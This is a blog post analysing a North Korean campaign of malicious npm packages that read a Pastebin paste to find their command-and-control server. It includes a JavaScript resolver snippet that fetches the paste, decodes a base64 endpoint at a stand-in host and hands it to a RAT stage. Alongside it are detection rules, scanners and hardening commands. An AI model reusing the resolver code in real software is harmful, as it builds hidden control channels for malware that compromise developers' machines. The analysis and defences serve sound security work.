DEV Community

Satyam Rastogi

Posted on • Originally published at satyamrastogi.com

North Korean npm Package Attack: Pastebin C2 RAT TTPs Analysis


North Korean threat actors published 26 malicious npm packages masquerading as developer tools, using Pastebin content as dead drop resolvers for C2 communications in targeted supply chain attacks.


Executive Summary

North Korean threat actors have escalated their Contagious Interview campaign by publishing 26 malicious npm packages that masquerade as legitimate developer tools. These packages leverage Pastebin content as dead drop resolvers to establish command-and-control communications for cross-platform RAT deployment, representing a sophisticated supply chain attack vector targeting the JavaScript ecosystem.

Attack Vector Analysis

Reconnaissance Phase

The attackers begin by identifying high-value targets in the developer community, particularly those involved in cryptocurrency, blockchain, or financial technology projects. This aligns with North Korea's historical focus on financial gain through cyber operations.

The reconnaissance involves:

  • Monitoring GitHub repositories and npm downloads for popular developer tools
  • Identifying package naming patterns that developers commonly search for
  • Analyzing legitimate package functionality to create convincing replicas

Initial Access via Supply Chain Compromise

The attack leverages T1195.002 Supply Chain Compromise: Compromise Software Supply Chain by poisoning the npm registry with malicious packages. Developers unknowingly install these packages through standard package management workflows.

Key techniques include:

  • Typosquatting: Creating packages with names similar to popular tools
  • Social engineering: packages are presented as legitimate developer utilities, with plausible READMEs and version histories
  • Trusted platform abuse: Leveraging npm's reputation to bypass initial scrutiny

Dead Drop Resolver Mechanism

The most sophisticated aspect of this campaign involves using Pastebin as a dead drop resolver, implementing T1102.001 Web Service: Dead Drop Resolver. The package on disk contains only a paste ID; the real C2 address lives in the paste body. This gives the attacker three advantages:

  1. Legitimate service abuse: a request to pastebin.com blends into normal web traffic, although a node process fetching a /raw/ paste from a build host is itself a usable detection signal
  2. Dynamic C2 rotation: editing the paste moves the C2 without republishing the package or touching infected hosts
  3. Concealment in plain sight: the C2 endpoint is base64-encoded inside a code comment, so the paste reads as an ordinary utility snippet

The malicious packages contain code similar to:

const https = require('https');
const pasteId = 'xY3mK9qP'; // Embedded paste ID (illustrative value)

// Stage 1: resolve the dead drop. Only the paste ID is hard-coded; the C2
// address is read from the paste body, so the attacker can rotate it at will.
function fetchC2Config() {
  const options = {
    hostname: 'pastebin.com',
    port: 443,
    path: `/raw/${pasteId}`, // the raw endpoint returns the paste body without HTML
    method: 'GET',
    headers: {
      // Spoofed client string; a real npm client identifies as "npm/<ver> node/<ver> <os> <arch>"
      'User-Agent': 'Mozilla/5.0 (compatible; npm/8.1.0)'
    }
  };

  const req = https.request(options, (res) => {
    let data = '';
    res.on('data', chunk => data += chunk);
    res.on('end', () => extractC2(data));
  });
  req.on('error', () => {}); // fail silently so nothing is logged on a network error
  req.end();
}

// Stage 2: pull the base64 blob out of a /* ... */ comment and decode it.
function extractC2(pasteContent) {
  const pattern = /\/\* ([A-Za-z0-9+\/=]+) \*\//;
  const match = pasteContent.match(pattern);
  if (match) {
    // Decodes to the C2 endpoint, e.g. https://c2.example.com:8443 in the paste shown below
    const c2Endpoint = Buffer.from(match[1], 'base64').toString();
    establishC2(c2Endpoint); // RAT stage; not reproduced in this post
  }
}

Persistence and Execution

Once installed, the malicious packages implement T1543.003 Create or Modify System Process: Windows Service on Windows systems; on Linux the cron jobs described below correspond to T1053.003 Scheduled Task/Job: Cron, with equivalent mechanisms on macOS.

The RAT payload's platform-specific capabilities are listed under Cross-Platform RAT Capabilities below.

Technical Deep Dive

Package Masquerading Techniques

The 26 identified packages used various masquerading strategies:

  1. Development tool spoofing:
    • webpack-dev-optimizer
    • babel-core-extended
    • eslint-config-standard-plus
  2. Security tool mimicking:
    • npm-audit-enhanced
    • security-scanner-cli
  3. Utility library imitation:
    • lodash-utils-extra
    • moment-timezone-extended

C2 Communication Protocol

The dead drop resolver mechanism works as follows. The attacker-controlled paste looks like an ordinary utility snippet; the only payload is the comment:

// Example Pastebin content (appears innocuous)
// JavaScript utility functions
const crypto = require('crypto');

function calculateHash(input) {
  /* aHR0cHM6Ly9jMi5leGFtcGxlLmNvbTo4NDQz */
  return crypto.createHash('sha256').update(input).digest('hex');
}

// The base64 comment decodes to: https://c2.example.com:8443
// Rotating the C2 means editing this paste; the package on disk never changes.

This approach mirrors techniques we analyzed in our third-party software drift exploitation playbook, where attackers abuse trusted software distribution channels for initial access.

Cross-Platform RAT Capabilities

The deployed RAT includes platform-specific modules:

  • Windows: PowerShell-based data collection
  • Linux: Bash script execution and cron job installation
  • macOS: Keychain access and application monitoring

This multi-platform approach aligns with the supply chain attack vectors we detailed in our Google Cloud API key exposure analysis, demonstrating how npm packages can compromise diverse development environments.

MITRE ATT&CK Mapping

The techniques named in the sections above, consolidated:

  • T1195.002 Supply Chain Compromise: Compromise Software Supply Chain (malicious packages published to npm)
  • T1036.005 Masquerading: Match Legitimate Name or Location (typosquatted package names)
  • T1102.001 Web Service: Dead Drop Resolver (C2 address read from a Pastebin raw paste)
  • T1132.001 Data Encoding: Standard Encoding (base64-encoded endpoint in a code comment)
  • T1543.003 Create or Modify System Process: Windows Service (Windows persistence)
  • T1053.003 Scheduled Task/Job: Cron (Linux persistence)
  • T1059.001 Command and Scripting Interpreter: PowerShell (Windows collection module)
  • T1059.004 Command and Scripting Interpreter: Unix Shell (Linux bash module)
  • T1555.001 Credentials from Password Stores: Keychain (macOS module)

Real-World Impact

This campaign represents a significant threat to organizations for several reasons:

  1. Developer environment compromise: Workstations with privileged access to source code, production systems, and intellectual property
  2. Cryptocurrency theft: Direct financial impact through wallet compromise
  3. Supply chain propagation: Potential for malicious code to propagate into production applications
  4. Intelligence gathering: Access to proprietary algorithms, business logic, and customer data

The financial technology sector faces particular risk, as demonstrated by the targeting patterns observed in this campaign and similar attacks we covered in our ransomware healthcare attack chain analysis.

Detection Strategies

Network Monitoring

  • Alert on requests to pastebin.com/raw/ from developer and build hosts, especially from non-browser clients (node, npm, curl); a developer reading a paste in a browser is normal, a node process polling the raw endpoint is not
  • Baseline normal npm package installation patterns (registries used, volume, time of day) and alert on deviations
  • Flag repeated fetches of the same paste from one host, which is the resolver polling for a new C2 address
  • Where TLS inspection is in place, look for base64 blobs inside code comments in paste responses; the encoded endpoint sits in the response body, not the request
  • Flag unusual outbound connections from developer workstations, in particular to the decoded C2 endpoint on non-standard ports such as 8443
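Detection logic over constructed proxy log lines, added here as an example and not part of the original post or of any vendor tooling. The log format, the developer subnet prefix 10.20. and the sample hosts are assumptions; the paste ID and spoofed User-Agent are the illustrative values from the code earlier on this page. The two signals it keys on are the client type (browser versus scripted HTTP client) and repetition of the same paste from one host.

```javascript
'use strict';

// Constructed proxy log lines in an assumed "ts src_ip method host path \"user_agent\"" format.
// 10.20.1.15 polls the same raw paste every five minutes with the spoofed client string
// from the post; 10.20.1.22 is a person opening a paste in a browser; 10.50.7.9 is a
// non-developer host using curl.
const SAMPLE_LOG = `
2025-01-10T09:12:01Z 10.20.1.15 GET registry.npmjs.org /lodash/-/lodash-4.17.21.tgz "npm/10.2.0 node/v20.11.0 linux x64"
2025-01-10T09:12:03Z 10.20.1.15 GET pastebin.com /raw/xY3mK9qP "Mozilla/5.0 (compatible; npm/8.1.0)"
2025-01-10T09:17:03Z 10.20.1.15 GET pastebin.com /raw/xY3mK9qP "Mozilla/5.0 (compatible; npm/8.1.0)"
2025-01-10T09:22:03Z 10.20.1.15 GET pastebin.com /raw/xY3mK9qP "Mozilla/5.0 (compatible; npm/8.1.0)"
2025-01-10T10:01:44Z 10.20.1.22 GET pastebin.com /xY3mK9qP "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36"
2025-01-10T10:05:00Z 10.50.7.9 GET pastebin.com /raw/abc12345 "curl/8.4.0"
`;

// Assumed address prefixes of developer workstations and build agents.
const DEV_SUBNETS = ['10.20.'];

// Paste services used as dead drops; the post names only pastebin.com.
const PASTE_HOSTS = new Set(['pastebin.com']);

const LINE_RE = /^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null;
  const [, ts, src, method, host, path, ua] = m;
  return { ts, src, method, host, path, ua };
}

// Real browsers identify a rendering engine; scripted clients (node https, axios,
// curl, or the spoofed "compatible; npm" string in the post) do not.
function isBrowserUA(ua) {
  return /AppleWebKit|Gecko\/|Firefox\//.test(ua);
}

function isDevHost(ip, subnets) {
  return subnets.some((prefix) => ip.startsWith(prefix));
}

// Returns { alerts, repeated }: one alert per non-browser fetch of a raw paste,
// and one "repeated" entry per (host, paste) pair seen three or more times.
function analyzeProxyLog(logText, devSubnets = DEV_SUBNETS) {
  const alerts = [];
  const counts = new Map();
  for (const rawLine of logText.split('\n')) {
    const e = parseLine(rawLine);
    if (!e || !PASTE_HOSTS.has(e.host)) continue;
    const rawFetch = e.path.startsWith('/raw/');
    if (!rawFetch || isBrowserUA(e.ua)) continue; // a person reading a paste is normal
    const dev = isDevHost(e.src, devSubnets);
    alerts.push({
      ts: e.ts,
      src: e.src,
      paste: e.path.slice('/raw/'.length),
      ua: e.ua,
      severity: dev ? 'high' : 'medium', // developer hosts are the campaign's target
    });
    const key = `${e.src} ${e.path}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  // The same host re-fetching the same paste is the resolver polling for a new C2.
  const repeated = [...counts]
    .filter(([, n]) => n >= 3)
    .map(([key, count]) => {
      const [src, path] = key.split(' ');
      return { src, path, count };
    });
  return { alerts, repeated };
}

console.log(JSON.stringify(analyzeProxyLog(SAMPLE_LOG), null, 2));
```

On the sample above this yields four alerts (three high-severity from the developer host, one medium from the curl client) and one repetition record; the browser visit to the paste's HTML page is not reported. Map your own proxy export onto the six columns before feeding it in.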

Endpoint Detection

# Record executions of npm (auditctl installs the rule; auditd is the daemon that logs it)
auditctl -w /usr/bin/npm -p x -k npm_execution
ausearch -k npm_execution

# Track package.json modifications in the project directory
inotifywait -m -e modify package.json

# Look for the persistence described above: new cron entries and services
crontab -l; ls -la /etc/cron.d /var/spool/cron 2>/dev/null
systemctl list-units --type=service --state=running
launchctl list   # macOS

Code Analysis

Implement static analysis rules to detect:

  • Base64-encoded strings in npm packages, in particular ones that decode to URLs or JSON configuration
  • Pastebin hostnames, /raw/<id> paths or other paste-service URL patterns
  • Obfuscated JavaScript execution (eval, new Function, child_process invoked from install or import time)
  • Unusual network request patterns, such as outbound HTTP from a package that has no networking purpose
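A static scanner for the patterns listed above, added as an example and not the post's own code or any vendor rule set. It runs over three constructed inputs: a source file shaped like the resolver snippet earlier on this page, the example paste body, and a benign file holding a base64-encoded PNG, which shows why decoded blobs are classified before they are reported. The rules, thresholds and file names are assumptions.

```javascript
'use strict';

// Constructed sample: a file shaped like the resolver in the post (not a real package).
const SUSPECT_SOURCE = `
const https = require('https');
const pasteId = 'xY3mK9qP';
const opts = { hostname: 'pastebin.com', path: '/raw/' + pasteId };
function run(cfg) { require('child_process').exec(cfg.cmd); }
`;

// Constructed sample: the paste body from the post, a base64 URL hidden in a comment.
const SUSPECT_PASTE = `
function calculateHash(input) {
  /* aHR0cHM6Ly9jMi5leGFtcGxlLmNvbTo4NDQz */
  return crypto.createHash('sha256').update(input).digest('hex');
}
`;

// Constructed benign sample: a long base64 string that is a real asset (a 1x1 PNG),
// with no paste-service reference and no shell or eval usage.
const BENIGN_SOURCE = `
const ICON = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==';
module.exports = { ICON };
`;

// Pattern rules, evaluated per line.
const RULES = [
  {
    id: 'paste-service',
    re: /pastebin\.com|\/raw\/[A-Za-z0-9]{8}\b/,
    why: 'reference to Pastebin or a /raw/<id> path (dead drop resolver)',
  },
  {
    id: 'dynamic-eval',
    re: /\beval\s*\(|new\s+Function\s*\(|child_process/,
    why: 'dynamic code or shell execution',
  },
];

// Runs of 20 or more base64 characters, optionally padded.
const B64_RE = /[A-Za-z0-9+/]{20,}={0,2}/g;

// Decode a blob and keep it only if it is printable text that looks like a URL or JSON.
// Binary assets (images, fonts) decode to control bytes and are dropped here, which
// is what keeps the rule from drowning in false positives.
function decodeIfMeaningful(blob) {
  const text = Buffer.from(blob, 'base64').toString('utf8');
  if (!/^[\x20-\x7e\s]+$/.test(text)) return null;
  if (/^https?:\/\//.test(text)) return { kind: 'url', value: text };
  try {
    JSON.parse(text);
    return { kind: 'json', value: text };
  } catch (_e) {
    return null;
  }
}

// Returns an array of { file, line, rule, detail } findings for one source file.
function scanSource(name, code) {
  const findings = [];
  code.split('\n').forEach((line, i) => {
    for (const r of RULES) {
      if (r.re.test(line)) findings.push({ file: name, line: i + 1, rule: r.id, detail: r.why });
    }
    for (const blob of line.match(B64_RE) || []) {
      const decoded = decodeIfMeaningful(blob);
      if (decoded) {
        findings.push({ file: name, line: i + 1, rule: `encoded-${decoded.kind}`, detail: decoded.value });
      }
    }
  });
  return findings;
}

for (const [name, code] of [['index.js', SUSPECT_SOURCE], ['paste.txt', SUSPECT_PASTE], ['icon.js', BENIGN_SOURCE]]) {
  console.log(name, scanSource(name, code));
}
```

Pointed at node_modules, the scanner reports the Pastebin hostname and the child_process call in the resolver-shaped file, the decoded https://c2.example.com:8443 in the paste, and nothing for the icon file. The decode-and-classify step is the part worth keeping: a rule that flags every long base64 run fires on every bundled asset in a typical dependency tree.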

Mitigation & Hardening

Immediate Actions

  1. Package verification: verify registry signatures and provenance attestations with npm audit signatures, and pin every dependency through a committed lockfile
  2. Network segmentation: Isolate developer environments from production systems
  3. Allowlist approach: Restrict package installations to pre-approved registries

Long-term Controls

Consistent with NIST Cybersecurity Framework guidelines:

  1. Supply chain security: Implement package scanning in CI/CD pipelines
  2. Zero trust architecture: Assume npm packages are potentially compromised
  3. Behavioral monitoring: Deploy EDR solutions that detect post-installation activities

Configuration Hardening

# Restrict npm to the internal registry only
npm config set registry https://internal-registry.company.com

# Fail npm audit on high-severity advisories (this is not signature verification;
# run `npm audit signatures` for that)
npm config set audit-level high

# Reduce noise in install output so warnings are not buried
npm config set fund false
npm config set update-notifier false
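An install-time audit, added as an example and not part of the post or of npm itself. It reads dependency manifests and a package-lock.json (lockfileVersion 3) fragment, both constructed here (in practice you load them from node_modules/*/package.json and the project lockfile), lists packages that run code during install, and checks that every resolved tarball URL points at the allowlisted registry and carries an integrity hash. The registry hostname is the one from the configuration snippet above; the package names are made up.

```javascript
'use strict';

// Lifecycle hooks npm runs automatically during install; a malicious package
// puts its loader in one of these so the code runs before anything imports it.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Assumed allowlisted registry (the hostname used in the post's npm config snippet).
const ALLOWED_REGISTRY = 'https://internal-registry.company.com/';

// Constructed dependency manifests, as read from node_modules/<name>/package.json.
const MANIFESTS = [
  { name: 'left-pad-ish', version: '1.0.0' },
  { name: 'build-helper-x', version: '0.3.1', scripts: { postinstall: 'node ./setup.js' } },
  { name: 'native-thing', version: '2.0.0', scripts: { install: 'node-gyp rebuild' } },
];

// Constructed package-lock.json v3 fragment. build-helper-x was resolved from the
// public registry; native-thing has no integrity hash.
const LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'app' },
    'node_modules/left-pad-ish': {
      version: '1.0.0',
      resolved: 'https://internal-registry.company.com/left-pad-ish/-/left-pad-ish-1.0.0.tgz',
      integrity: 'sha512-AAAA',
    },
    'node_modules/build-helper-x': {
      version: '0.3.1',
      resolved: 'https://registry.npmjs.org/build-helper-x/-/build-helper-x-0.3.1.tgz',
      integrity: 'sha512-BBBB',
    },
    'node_modules/native-thing': {
      version: '2.0.0',
      resolved: 'https://internal-registry.company.com/native-thing/-/native-thing-2.0.0.tgz',
    },
  },
};

// Every package that will execute a command at install time, with the command.
function findInstallScripts(manifests) {
  const out = [];
  for (const m of manifests) {
    for (const hook of INSTALL_HOOKS) {
      const cmd = m.scripts && m.scripts[hook];
      if (cmd) out.push({ name: m.name, version: m.version, hook, cmd });
    }
  }
  return out;
}

// Lockfile entries whose tarball came from outside the allowlist or lacks an
// integrity hash (without one, npm cannot detect a swapped tarball on reinstall).
function auditLock(lock, allowedRegistry) {
  const problems = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project itself
    const name = path.replace(/^.*node_modules\//, ''); // handles nested and scoped paths
    if (!entry.resolved || !entry.resolved.startsWith(allowedRegistry)) {
      problems.push({ name, issue: 'resolved-outside-allowlist', resolved: entry.resolved || null });
    }
    if (!entry.integrity) {
      problems.push({ name, issue: 'missing-integrity' });
    }
  }
  return problems;
}

console.log('install scripts:', findInstallScripts(MANIFESTS));
console.log('lockfile problems:', auditLock(LOCK, ALLOWED_REGISTRY));
```

The install-script list is the review queue: each entry is code that runs with the developer's privileges the moment `npm install` completes, which is exactly the execution path a trojanised package needs. The setting that closes that path outright is `npm config set ignore-scripts true` (or `ignore-scripts=true` in .npmrc), after which packages that genuinely need a build step are rebuilt explicitly with `npm rebuild <name>`. Lockfile entries resolved outside the allowlist indicate an install that bypassed the registry restriction and should be re-resolved.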

Follow CISA's software supply chain guidance for comprehensive protection strategies.

Key Takeaways

  • North Korean threat actors continue evolving supply chain attack techniques, using legitimate services like Pastebin for C2 communication
  • Dead drop resolvers provide resilient C2 infrastructure that's difficult to detect and disrupt
  • Developer environments represent high-value targets requiring specialized security controls
  • Package integrity verification and network segmentation are critical defensive measures
  • Organizations must implement comprehensive supply chain security programs beyond traditional endpoint protection
